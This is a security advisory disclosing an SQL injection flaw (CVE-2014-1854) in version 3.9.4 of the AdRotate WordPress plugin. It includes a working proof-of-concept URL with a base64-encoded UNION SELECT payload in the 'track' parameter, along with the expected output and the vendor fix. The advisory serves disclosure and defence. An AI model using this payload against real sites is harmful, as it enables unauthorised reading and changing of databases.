Advisory ID: HTB23201
Product: AdRotate
Vendor: AJdG Solutions
Vulnerable Version(s): 3.9.4 and probably prior
Tested Version: 3.9.4
Advisory Publication: January 30, 2014 [without technical details]
Vendor Notification: January 30, 2014
Vendor Patch: January 31, 2014
Public Disclosure: February 20, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-1854
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
———————————————————————————————–
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in AdRotate: CVE-2014-1854
The vulnerability exists due to insufficient validation of “track” HTTP GET parameter passed to
“/wp-content/plugins/adrotate/library/clicktracker.php” script. A remote unauthenticated attacker can execute arbitrary SQL commands in application’s database.
The following PoC code contains a base64-encoded string “-1 UNION SELECT version(),1,1,1”, which will be injected into SQL query and will output MySQL server version:
http://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==
Successful exploitation will result in redirection to local URI that contains version of the MySQL server:
http://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log
———————————————————————————————–
Solution:
Update to AdRotate 3.9.5
More Information:
http://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/
http://wordpress.org/plugins/adrotate/changelog/
http://www.adrotateplugin.com/development/
———————————————————————————————–
References:
[1] High-Tech Bridge Advisory HTB23201 – https://www.htbridge.com/advisory/HTB23201 – SQL Injection in AdRotate.
[2] AdRotate – http://wordpress.org/plugins/adrotate/ – AdRotate for WordPress.
[3] Common Vulnerabilities and Exposures (CVE) – http://cve.mitre.org/ – international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) – http://cwe.mitre.org – targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® – http://www.htbridge.com/immuniweb/ – is High-Tech Bridge’s proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
———————————————————————————————–
评论关闭。